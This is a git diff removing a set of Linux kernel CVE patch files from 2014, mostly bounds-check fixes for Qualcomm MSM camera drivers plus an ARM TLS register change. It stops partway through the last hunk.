--- a/Patches/Linux_CVEs/CVE-2014-9866/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 8e6daae70422ad35146a87700e6634a747d1ff5d Mon Sep 17 00:00:00 2001
-From: Hariram Purushothaman <hpurus@codeaurora.org>
-Date: Tue, 16 Jul 2013 11:23:47 -0700
-Subject: msm: camera: Bound check num_cid from userspace in csid driver
-
-Upper and lower bound checks are enforced for num_cid
-which is passed from userspace with lower as 1 and
-max of 16.
-
-Change-Id: Ic5456289cb2f2b4ea17610a7672eb2c5225b7954
-Signed-off-by: Hariram Purushothaman <hpurus@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-index 9aca234..229fdb2 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-@@ -440,7 +440,7 @@ static long msm_csid_cmd(struct csid_device *csid_dev, void *arg)
- 	case CSID_CFG: {
- 		struct msm_camera_csid_params csid_params;
- 		struct msm_camera_csid_vc_cfg *vc_cfg = NULL;
--		int32_t i = 0;
-+		int8_t i = 0;
- 		if (copy_from_user(&csid_params,
- 			(void *)cdata->cfg.csid_params,
- 			sizeof(struct msm_camera_csid_params))) {
-@@ -448,6 +448,13 @@ static long msm_csid_cmd(struct csid_device *csid_dev, void *arg)
- 			rc = -EFAULT;
- 			break;
- 		}
-+		if (csid_params.lut_params.num_cid < 1 ||
-+			csid_params.lut_params.num_cid > 16) {
-+			pr_err("%s: %d num_cid outside range\n",
-+				 __func__, __LINE__);
-+			rc = -EINVAL;
-+			break;
-+		}
- 		for (i = 0; i < csid_params.lut_params.num_cid; i++) {
- 			vc_cfg = kzalloc(csid_params.lut_params.num_cid *
- 				sizeof(struct msm_camera_csid_vc_cfg),
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9867/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9867/ANY/0001.patch
deleted file mode 100644
index 88d4f24d..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9867/ANY/0001.patch
+++ /dev/null
@@ -1,108 +0,0 @@
-From 322c518689a7f820165ca4c5d6b750b02ac34665 Mon Sep 17 00:00:00 2001
-From: Jim Rasche <jrasche@codeaurora.org>
-Date: Mon, 22 Jul 2013 15:03:50 -0700
-Subject: msm:camera: Fix multiple bounds check
-
-Added bounds check to user input num_streams at several location,
-without checking a position outside array could be dereferenced
-
-Change-Id: I6e82d8b51e4ec6772316c7daef243240c029db96
-Signed-off-by: Jim Rasche <jrasche@codeaurora.org>
----
- .../platform/msm/camera_v2/isp/msm_isp_axi_util.c  | 46 ++++++++++++++++++++++
- 1 file changed, 46 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-index 5b7658d..746425b 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-@@ -300,7 +300,16 @@ int msm_isp_axi_check_stream_state(
- 	struct msm_vfe_axi_stream *stream_info;
- 	enum msm_vfe_axi_state valid_state =
- 		(stream_cfg_cmd->cmd == START_STREAM) ? INACTIVE : ACTIVE;
-+
-+	if (stream_cfg_cmd->num_streams > MAX_NUM_STREAM) {
-+		return -EINVAL;
-+	}
-+
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-+		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
-+		> MAX_NUM_STREAM) {
-+			return -EINVAL;
-+		}
- 		stream_info = &axi_data->stream_info[
- 			HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])];
- 		spin_lock_irqsave(&stream_info->lock, flags);
-@@ -840,7 +849,16 @@ static void msm_isp_update_camif_output_count(
- 	int i;
- 	struct msm_vfe_axi_stream *stream_info;
- 	struct msm_vfe_axi_shared_data *axi_data = &vfe_dev->axi_data;
-+
-+	if (stream_cfg_cmd->num_streams > MAX_NUM_STREAM) {
-+		return;
-+	}
-+
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-+		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
-+		> MAX_NUM_STREAM) {
-+			return;
-+		}
- 		stream_info =
- 			&axi_data->stream_info[
- 			HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])];
-@@ -1020,7 +1038,16 @@ static int msm_isp_start_axi_stream(struct vfe_device *vfe_dev,
- 	uint32_t wm_reload_mask = 0x0;
- 	struct msm_vfe_axi_stream *stream_info;
- 	struct msm_vfe_axi_shared_data *axi_data = &vfe_dev->axi_data;
-+
-+	if (stream_cfg_cmd->num_streams > MAX_NUM_STREAM) {
-+		return -EINVAL;
-+	}
-+
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-+		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
-+		> MAX_NUM_STREAM) {
-+			return -EINVAL;
-+		}
- 		stream_info = &axi_data->stream_info[
- 			HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])];
- 		src_state = axi_data->src_info[
-@@ -1073,7 +1100,16 @@ static int msm_isp_stop_axi_stream(struct vfe_device *vfe_dev,
- 	uint8_t wait_for_complete = 0;
- 	struct msm_vfe_axi_stream *stream_info;
- 	struct msm_vfe_axi_shared_data *axi_data = &vfe_dev->axi_data;
-+
-+	if (stream_cfg_cmd->num_streams > MAX_NUM_STREAM) {
-+		return -EINVAL;
-+	}
-+
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-+		if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
-+		> MAX_NUM_STREAM) {
-+			return -EINVAL;
-+		}
- 		stream_info = &axi_data->stream_info[
- 			HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])];
- 
-@@ -1158,8 +1194,18 @@ int msm_isp_update_axi_stream(struct vfe_device *vfe_dev, void *arg)
- 		return -EBUSY;
- 	}
- 
-+	/*num_stream is uint32 and update_info[] bound by MAX_NUM_STREAM*/
-+	if (update_cmd->num_streams > MAX_NUM_STREAM) {
-+		return -EINVAL;
-+	}
-+
- 	for (i = 0; i < update_cmd->num_streams; i++) {
- 		update_info = &update_cmd->update_info[i];
-+		/*check array reference bounds*/
-+		if (HANDLE_TO_IDX(update_info->stream_handle)
-+		 > MAX_NUM_STREAM) {
-+			return -EINVAL;
-+		}
- 		stream_info = &axi_data->stream_info[
- 				HANDLE_TO_IDX(update_info->stream_handle)];
- 		if (stream_info->state != ACTIVE &&
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9868/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9868/ANY/0001.patch
deleted file mode 100644
index 6107cf1c..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9868/ANY/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 1f274b74c00187ba1c379971503f51944148b22f Mon Sep 17 00:00:00 2001
-From: Lakshmi Narayana Kalavala <lkalaval@codeaurora.org>
-Date: Thu, 25 Jul 2013 15:55:03 -0700
-Subject: msm: camera: Fix possible out of bound writes in csi driver
-
-The value csi_lane_mask which is uint16_t is controllable from userspace.
-The while loop can loop for 2^16 - 1, Hence extract the required
-bit combination from the userspace argument, used it for further
-processing.
-
-CRs-Fixed: 511976
-Change-Id: I80b0fe7ac273352503d9705510f05debe6cbb10a
-Signed-off-by: Lakshmi Narayana Kalavala <lkalaval@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-index 21b9cdc..32cf0d3 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-@@ -423,7 +423,7 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- 				__LINE__, csi_lane_params);
- 			return -EINVAL;
- 		}
--		csi_lane_mask = csi_lane_params->csi_lane_mask;
-+		csi_lane_mask = (csi_lane_params->csi_lane_mask & 0x1F);
- 
- 		CDBG("%s csiphy_params, lane assign %x mask = %x\n",
- 			__func__,
-@@ -436,7 +436,7 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- 		csiphy_dev->lane_mask[csiphy_dev->pdev->id] &=
- 			~(csi_lane_mask);
- 		i = 0;
--		while (csi_lane_mask & 0x1F) {
-+		while (csi_lane_mask) {
- 			if (csi_lane_mask & 0x1) {
- 				msm_camera_io_w(0x0, csiphy_dev->base +
- 					MIPI_CSIPHY_LNn_CFG2_ADDR + 0x40*i);
-@@ -507,7 +507,7 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- 				__LINE__, csi_lane_params);
- 			return -EINVAL;
- 		}
--		csi_lane_mask = csi_lane_params->csi_lane_mask;
-+		csi_lane_mask = (csi_lane_params->csi_lane_mask & 0x1F);
- 
- 		CDBG("%s csiphy_params, lane assign %x mask = %x\n",
- 			__func__,
-@@ -520,7 +520,7 @@ static int msm_csiphy_release(struct csiphy_device *csiphy_dev, void *arg)
- 		csiphy_dev->lane_mask[csiphy_dev->pdev->id] &=
- 			~(csi_lane_mask);
- 		i = 0;
--		while (csi_lane_mask & 0x1F) {
-+		while (csi_lane_mask) {
- 			if (csi_lane_mask & 0x1) {
- 				msm_camera_io_w(0x0, csiphy_dev->base +
- 					MIPI_CSIPHY_LNn_CFG2_ADDR + 0x40*i);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9869/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9869/ANY/0001.patch
deleted file mode 100644
index 289a1d0f..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9869/ANY/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From 8d1f7531ff379befc129a6447642061e87562bca Mon Sep 17 00:00:00 2001
-From: Hariram Purushothaman <hpurus@codeaurora.org>
-Date: Tue, 23 Jul 2013 15:39:09 -0700
-Subject: msm: camera: Check stats index MAX in ISP driver
-
-Add a check for the stats index MAX using
-MSM_ISP_STATS_MAX before accessing stream info
-using that index to avoid any invalid memory access.
-
-Change-Id: Iaade2af5d0e3e073e9519961a0f84a93038284bf
-CRs-Fixed: 514711
-Signed-off-by: Hariram Purushothaman <hpurus@codeaurora.org>
----
- .../msm/camera_v2/isp/msm_isp_stats_util.c         | 22 +++++++++++++++++++---
- 1 file changed, 19 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index d857a14..33f63b3 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -150,6 +150,12 @@ int msm_isp_stats_create_stream(struct vfe_device *vfe_dev,
- 	stats_idx = vfe_dev->hw_info->vfe_ops.stats_ops.
- 		get_stats_idx(stream_req_cmd->stats_type);
- 
-+	if ((stats_idx > MSM_ISP_STATS_MAX) ||
-+		(stats_idx == -EINVAL)) {
-+		pr_err("%s: Stats idx Error\n", __func__);
-+		return rc;
-+	}
-+
- 	stream_info = &stats_data->stream_info[stats_idx];
- 	if (stream_info->state != STATS_AVALIABLE) {
- 		pr_err("%s: Stats already requested\n", __func__);
-@@ -188,7 +194,7 @@ int msm_isp_stats_create_stream(struct vfe_device *vfe_dev,
- 
- int msm_isp_request_stats_stream(struct vfe_device *vfe_dev, void *arg)
- {
--	int rc = 0;
-+	int rc = -1;
- 	struct msm_vfe_stats_stream_request_cmd *stream_req_cmd = arg;
- 	struct msm_vfe_stats_stream *stream_info = NULL;
- 	struct msm_vfe_stats_shared_data *stats_data = &vfe_dev->stats_data;
-@@ -202,6 +208,11 @@ int msm_isp_request_stats_stream(struct vfe_device *vfe_dev, void *arg)
- 	}
- 
- 	stats_idx = STATS_IDX(stream_req_cmd->stream_handle);
-+	if (stats_idx > MSM_ISP_STATS_MAX) {
-+		pr_err("%s: Stats idx Error\n", __func__);
-+		return rc;
-+	}
-+
- 	stream_info = &stats_data->stream_info[stats_idx];
- 
- 	framedrop_period = msm_isp_get_framedrop_period(
-@@ -228,9 +239,14 @@ int msm_isp_release_stats_stream(struct vfe_device *vfe_dev, void *arg)
- 	struct msm_vfe_stats_stream_release_cmd *stream_release_cmd = arg;
- 	struct msm_vfe_stats_shared_data *stats_data = &vfe_dev->stats_data;
- 	int stats_idx = STATS_IDX(stream_release_cmd->stream_handle);
--	struct msm_vfe_stats_stream *stream_info =
--		&stats_data->stream_info[stats_idx];
-+	struct msm_vfe_stats_stream *stream_info = NULL;
-+
-+	if (stats_idx > MSM_ISP_STATS_MAX) {
-+		pr_err("%s: Stats idx Error\n", __func__);
-+		return rc;
-+	}
- 
-+	stream_info = &stats_data->stream_info[stats_idx];
- 	if (stream_info->state == STATS_AVALIABLE) {
- 		pr_err("%s: stream already release\n", __func__);
- 		return rc;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9869/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-9869/ANY/0002.patch
deleted file mode 100644
index fb032866..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9869/ANY/0002.patch
+++ /dev/null
@@ -1,145 +0,0 @@
-From 7a26934e4196b4aa61944081989189d59b108768 Mon Sep 17 00:00:00 2001
-From: Petar Sivenov <psiven@codeaurora.org>
-Date: Tue, 13 Aug 2013 10:12:39 -0700
-Subject: msm: camera: isp: Bound check for number stats registers
-
-The index of used stats register is derived from a stream handle least
-significant byte and thus can be up to 255. However the stats registers
-are up to 8 depending of the target. Thus a bound check is done before
-use of the received stats register index value.
-
-Change-Id: Ic008918f4263f57a5b8aabd34266ac1ba3612a9c
-Signed-off-by: Petar Sivenov <psiven@codeaurora.org>
----
- .../msm/camera_v2/isp/msm_isp_stats_util.c         | 50 ++++++++++++++++------
- .../platform/msm/camera_v2/isp/msm_isp_util.c      |  4 +-
- 2 files changed, 41 insertions(+), 13 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index 0840e30..b479857 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -23,8 +23,16 @@ static int msm_isp_stats_cfg_ping_pong_address(struct vfe_device *vfe_dev,
- 	struct msm_isp_buffer *buf;
- 	uint32_t pingpong_bit = 0;
- 	uint32_t bufq_handle = stream_info->bufq_handle;
--	uint32_t stats_pingpong_offset =
--		STATS_IDX(stream_info->stream_handle) +
-+	uint32_t stats_pingpong_offset;
-+
-+	if (STATS_IDX(stream_info->stream_handle) >=
-+			vfe_dev->hw_info->stats_hw_info->num_stats_type) {
-+		pr_err("%s Invalid stats index %d", __func__,
-+				STATS_IDX(stream_info->stream_handle));
-+		return -EINVAL;
-+	}
-+
-+	stats_pingpong_offset = STATS_IDX(stream_info->stream_handle) +
- 		vfe_dev->hw_info->stats_hw_info->stats_ping_pong_offset;
- 
- 	pingpong_bit = (~(pingpong_status >> stats_pingpong_offset) & 0x1);
-@@ -151,10 +159,9 @@ int msm_isp_stats_create_stream(struct vfe_device *vfe_dev,
- 	stats_idx = vfe_dev->hw_info->vfe_ops.stats_ops.
- 		get_stats_idx(stream_req_cmd->stats_type);
- 
--	if ((stats_idx > MSM_ISP_STATS_MAX) ||
--		(stats_idx == -EINVAL)) {
--		pr_err("%s: Stats idx Error\n", __func__);
--		return rc;
-+	if (stats_idx >= vfe_dev->hw_info->stats_hw_info->num_stats_type) {
-+		pr_err("%s Invalid stats index %d", __func__, stats_idx);
-+		return -EINVAL;
- 	}
- 
- 	stream_info = &stats_data->stream_info[stats_idx];
-@@ -209,9 +216,10 @@ int msm_isp_request_stats_stream(struct vfe_device *vfe_dev, void *arg)
- 	}
- 
- 	stats_idx = STATS_IDX(stream_req_cmd->stream_handle);
--	if (stats_idx > MSM_ISP_STATS_MAX) {
--		pr_err("%s: Stats idx Error\n", __func__);
--		return rc;
-+
-+	if (stats_idx >= vfe_dev->hw_info->stats_hw_info->num_stats_type) {
-+		pr_err("%s Invalid stats index %d", __func__, stats_idx);
-+		return -EINVAL;
- 	}
- 
- 	stream_info = &stats_data->stream_info[stats_idx];
-@@ -242,9 +250,9 @@ int msm_isp_release_stats_stream(struct vfe_device *vfe_dev, void *arg)
- 	int stats_idx = STATS_IDX(stream_release_cmd->stream_handle);
- 	struct msm_vfe_stats_stream *stream_info = NULL;
- 
--	if (stats_idx > MSM_ISP_STATS_MAX) {
--		pr_err("%s: Stats idx Error\n", __func__);
--		return rc;
-+	if (stats_idx >= vfe_dev->hw_info->stats_hw_info->num_stats_type) {
-+		pr_err("%s Invalid stats index %d", __func__, stats_idx);
-+		return -EINVAL;
- 	}
- 
- 	stream_info = &stats_data->stream_info[stats_idx];
-@@ -379,6 +387,12 @@ static int msm_isp_start_stats_stream(struct vfe_device *vfe_dev,
- 	struct msm_vfe_stats_shared_data *stats_data = &vfe_dev->stats_data;
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
- 		idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]);
-+
-+		if (idx >= vfe_dev->hw_info->stats_hw_info->num_stats_type) {
-+			pr_err("%s Invalid stats index %d", __func__, idx);
-+			return -EINVAL;
-+		}
-+
- 		stream_info = &stats_data->stream_info[idx];
- 		if (stream_info->stream_handle !=
- 				stream_cfg_cmd->stream_handle[i]) {
-@@ -423,6 +437,12 @@ static int msm_isp_stop_stats_stream(struct vfe_device *vfe_dev,
- 	struct msm_vfe_stats_shared_data *stats_data = &vfe_dev->stats_data;
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
- 		idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]);
-+
-+		if (idx >= vfe_dev->hw_info->stats_hw_info->num_stats_type) {
-+			pr_err("%s Invalid stats index %d", __func__, idx);
-+			return -EINVAL;
-+		}
-+
- 		stream_info = &stats_data->stream_info[idx];
- 		if (stream_info->stream_handle !=
- 				stream_cfg_cmd->stream_handle[i]) {
-@@ -453,6 +473,12 @@ static int msm_isp_stop_stats_stream(struct vfe_device *vfe_dev,
- 
- 	for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
- 		idx = STATS_IDX(stream_cfg_cmd->stream_handle[i]);
-+
-+		if (idx >= vfe_dev->hw_info->stats_hw_info->num_stats_type) {
-+			pr_err("%s Invalid stats index %d", __func__, idx);
-+			return -EINVAL;
-+		}
-+
- 		stream_info = &stats_data->stream_info[idx];
- 		msm_isp_deinit_stats_ping_pong_reg(vfe_dev, stream_info);
- 	}
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index fcdf34e..6dba4153 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -768,6 +768,8 @@ void msm_isp_update_error_frame_count(struct vfe_device *vfe_dev)
- void msm_isp_process_error_info(struct vfe_device *vfe_dev)
- {
- 	int i;
-+	uint8_t num_stats_type =
-+		vfe_dev->hw_info->stats_hw_info->num_stats_type;
- 	struct msm_vfe_error_info *error_info = &vfe_dev->error_info;
- 	static DEFINE_RATELIMIT_STATE(rs,
- 		DEFAULT_RATELIMIT_INTERVAL, DEFAULT_RATELIMIT_BURST);
-@@ -791,7 +793,7 @@ void msm_isp_process_error_info(struct vfe_device *vfe_dev)
- 				error_info->stream_framedrop_count[i] = 0;
- 			}
- 		}
--		for (i = 0; i < MSM_ISP_STATS_MAX; i++) {
-+		for (i = 0; i < num_stats_type; i++) {
- 			if (error_info->stats_framedrop_count[i] != 0 &&
- 				__ratelimit(&rs_stats)) {
- 				pr_err("%s: Stats stream[%d]: dropped %d frames\n",
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9870/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9870/ANY/0001.patch
deleted file mode 100644
index ae176f5b..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9870/ANY/0001.patch
+++ /dev/null
@@ -1,216 +0,0 @@
-From 4f57652fcd2dce7741f1ac6dc0417e2f265cd1de Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Andr=C3=A9=20Hentschel?= <nerv@dawncrow.de>
-Date: Tue, 18 Jun 2013 23:23:26 +0100
-Subject: ARM: 7735/2: Preserve the user r/w register TPIDRURW on context
- switch and fork
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-Since commit 6a1c53124aa1 the user writeable TLS register was zeroed to
-prevent it from being used as a covert channel between two tasks.
-
-There are more and more applications coming to Windows RT,
-Wine could support them, but mostly they expect to have
-the thread environment block (TEB) in TPIDRURW.
-
-This patch preserves that register per thread instead of clearing it.
-Unlike the TPIDRURO, which is already switched, the TPIDRURW
-can be updated from userspace so needs careful treatment in the case that we
-modify TPIDRURW and call fork(). To avoid this we must always read
-TPIDRURW in copy_thread.
-
-Change-Id: Ib1e25be7b9faa846ba5335aad2574e21a1246066
-Signed-off-by: André Hentschel <nerv@dawncrow.de>
-Signed-off-by: Will Deacon <will.deacon@arm.com>
-Signed-off-by: Jonathan Austin <jonathan.austin@arm.com>
-Signed-off-by: Russell King <rmk+kernel@arm.linux.org.uk>
-Git-commit: a4780adeefd042482f624f5e0d577bf9cdcbb760
-Git-repo: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
-[joonwoop@codeaurora.org: fixed merge conflict]
-CRs-fixed: 561044
-Signed-off-by: Joonwoo Park <joonwoop@codeaurora.org>
----
- arch/arm/include/asm/thread_info.h |  2 +-
- arch/arm/include/asm/tls.h         | 40 +++++++++++++++++++++++++-------------
- arch/arm/kernel/entry-armv.S       |  5 +++--
- arch/arm/kernel/process.c          |  4 +++-
- arch/arm/kernel/ptrace.c           |  2 +-
- arch/arm/kernel/traps.c            |  4 ++--
- 6 files changed, 37 insertions(+), 20 deletions(-)
-
-diff --git a/arch/arm/include/asm/thread_info.h b/arch/arm/include/asm/thread_info.h
-index 67d6443..2eb0c2c 100644
---- a/arch/arm/include/asm/thread_info.h
-+++ b/arch/arm/include/asm/thread_info.h
-@@ -58,7 +58,7 @@ struct thread_info {
- 	struct cpu_context_save	cpu_context;	/* cpu context */
- 	__u32			syscall;	/* syscall number */
- 	__u8			used_cp[16];	/* thread used copro */
--	unsigned long		tp_value;
-+	unsigned long		tp_value[2];	/* TLS registers */
- 	struct crunch_state	crunchstate;
- 	union fp_state		fpstate __attribute__((aligned(8)));
- 	union vfp_state		vfpstate;
-diff --git a/arch/arm/include/asm/tls.h b/arch/arm/include/asm/tls.h
-index 73409e6..83259b8 100644
---- a/arch/arm/include/asm/tls.h
-+++ b/arch/arm/include/asm/tls.h
-@@ -2,27 +2,30 @@
- #define __ASMARM_TLS_H
- 
- #ifdef __ASSEMBLY__
--	.macro set_tls_none, tp, tmp1, tmp2
-+#include <asm/asm-offsets.h>
-+	.macro switch_tls_none, base, tp, tpuser, tmp1, tmp2
- 	.endm
- 
--	.macro set_tls_v6k, tp, tmp1, tmp2
-+	.macro switch_tls_v6k, base, tp, tpuser, tmp1, tmp2
-+	mrc	p15, 0, \tmp2, c13, c0, 2	@ get the user r/w register
- 	mcr	p15, 0, \tp, c13, c0, 3		@ set TLS register
--	mov	\tmp1, #0
--	mcr	p15, 0, \tmp1, c13, c0, 2	@ clear user r/w TLS register
-+	mcr	p15, 0, \tpuser, c13, c0, 2	@ and the user r/w register
-+	str	\tmp2, [\base, #TI_TP_VALUE + 4] @ save it
- 	.endm
- 
--	.macro set_tls_v6, tp, tmp1, tmp2
-+	.macro switch_tls_v6, base, tp, tpuser, tmp1, tmp2
- 	ldr	\tmp1, =elf_hwcap
- 	ldr	\tmp1, [\tmp1, #0]
- 	mov	\tmp2, #0xffff0fff
- 	tst	\tmp1, #HWCAP_TLS		@ hardware TLS available?
--	mcrne	p15, 0, \tp, c13, c0, 3		@ yes, set TLS register
--	movne	\tmp1, #0
--	mcrne	p15, 0, \tmp1, c13, c0, 2	@ clear user r/w TLS register
- 	streq	\tp, [\tmp2, #-15]		@ set TLS value at 0xffff0ff0
-+	mrcne	p15, 0, \tmp2, c13, c0, 2	@ get the user r/w register
-+	mcrne	p15, 0, \tp, c13, c0, 3		@ yes, set TLS register
-+	mcrne	p15, 0, \tpuser, c13, c0, 2	@ set user r/w register
-+	strne	\tmp2, [\base, #TI_TP_VALUE + 4] @ save it
- 	.endm
- 
--	.macro set_tls_software, tp, tmp1, tmp2
-+	.macro switch_tls_software, base, tp, tpuser, tmp1, tmp2
- 	mov	\tmp1, #0xffff0fff
- 	str	\tp, [\tmp1, #-15]		@ set TLS value at 0xffff0ff0
- 	.endm
-@@ -31,19 +34,30 @@
- #ifdef CONFIG_TLS_REG_EMUL
- #define tls_emu		1
- #define has_tls_reg		1
--#define set_tls		set_tls_none
-+#define switch_tls	switch_tls_none
- #elif defined(CONFIG_CPU_V6)
- #define tls_emu		0
- #define has_tls_reg		(elf_hwcap & HWCAP_TLS)
--#define set_tls		set_tls_v6
-+#define switch_tls	switch_tls_v6
- #elif defined(CONFIG_CPU_32v6K)
- #define tls_emu		0
- #define has_tls_reg		1
--#define set_tls		set_tls_v6k
-+#define switch_tls	switch_tls_v6k
- #else
- #define tls_emu		0
- #define has_tls_reg		0
--#define set_tls		set_tls_software
-+#define switch_tls	switch_tls_software
- #endif
- 
-+#ifndef __ASSEMBLY__
-+static inline unsigned long get_tpuser(void)
-+{
-+	unsigned long reg = 0;
-+
-+	if (has_tls_reg && !tls_emu)
-+		__asm__("mrc p15, 0, %0, c13, c0, 2" : "=r" (reg));
-+
-+	return reg;
-+}
-+#endif
- #endif	/* __ASMARM_TLS_H */
-diff --git a/arch/arm/kernel/entry-armv.S b/arch/arm/kernel/entry-armv.S
-index 7a8c2d6..0bdba55 100644
---- a/arch/arm/kernel/entry-armv.S
-+++ b/arch/arm/kernel/entry-armv.S
-@@ -698,15 +698,16 @@ ENTRY(__switch_to)
-  UNWIND(.fnstart	)
-  UNWIND(.cantunwind	)
- 	add	ip, r1, #TI_CPU_SAVE
--	ldr	r3, [r2, #TI_TP_VALUE]
-  ARM(	stmia	ip!, {r4 - sl, fp, sp, lr} )	@ Store most regs on stack
-  THUMB(	stmia	ip!, {r4 - sl, fp}	   )	@ Store most regs on stack
-  THUMB(	str	sp, [ip], #4		   )
-  THUMB(	str	lr, [ip], #4		   )
-+	ldr	r4, [r2, #TI_TP_VALUE]
-+	ldr	r5, [r2, #TI_TP_VALUE + 4]
- #ifdef CONFIG_CPU_USE_DOMAINS
- 	ldr	r6, [r2, #TI_CPU_DOMAIN]
- #endif
--	set_tls	r3, r4, r5
-+	switch_tls r1, r4, r5, r3, r7
- #if defined(CONFIG_CC_STACKPROTECTOR) && !defined(CONFIG_SMP)
- 	ldr	r7, [r2, #TI_TASK]
- 	ldr	r8, =__stack_chk_guard
-diff --git a/arch/arm/kernel/process.c b/arch/arm/kernel/process.c
-index 0ff45bd..18e92f6 100644
---- a/arch/arm/kernel/process.c
-+++ b/arch/arm/kernel/process.c
-@@ -38,6 +38,7 @@
- #include <asm/thread_notify.h>
- #include <asm/stacktrace.h>
- #include <asm/mach/time.h>
-+#include <asm/tls.h>
- 
- #ifdef CONFIG_CC_STACKPROTECTOR
- #include <linux/stackprotector.h>
-@@ -558,7 +559,8 @@ copy_thread(unsigned long clone_flags, unsigned long stack_start,
- 	clear_ptrace_hw_breakpoint(p);
- 
- 	if (clone_flags & CLONE_SETTLS)
--		thread->tp_value = regs->ARM_r3;
-+		thread->tp_value[0] = childregs->ARM_r3;
-+	thread->tp_value[1] = get_tpuser();
- 
- 	thread_notify(THREAD_NOTIFY_COPY, thread);
- 
-diff --git a/arch/arm/kernel/ptrace.c b/arch/arm/kernel/ptrace.c
-index 9650c14..c6c6be7 100644
---- a/arch/arm/kernel/ptrace.c
-+++ b/arch/arm/kernel/ptrace.c
-@@ -844,7 +844,7 @@ long arch_ptrace(struct task_struct *child, long request,
- #endif
- 
- 		case PTRACE_GET_THREAD_AREA:
--			ret = put_user(task_thread_info(child)->tp_value,
-+			ret = put_user(task_thread_info(child)->tp_value[0],
- 				       datap);
- 			break;
- 
-diff --git a/arch/arm/kernel/traps.c b/arch/arm/kernel/traps.c
-index 12e6fcb..e0a066b 100644
---- a/arch/arm/kernel/traps.c
-+++ b/arch/arm/kernel/traps.c
-@@ -593,7 +593,7 @@ asmlinkage int arm_syscall(int no, struct pt_regs *regs)
- 		return regs->ARM_r0;
- 
- 	case NR(set_tls):
--		thread->tp_value = regs->ARM_r0;
-+		thread->tp_value[0] = regs->ARM_r0;
- 		if (tls_emu)
- 			return 0;
- 		if (has_tls_reg) {
-@@ -711,7 +711,7 @@ static int get_tp_trap(struct pt_regs *regs, unsigned int instr)
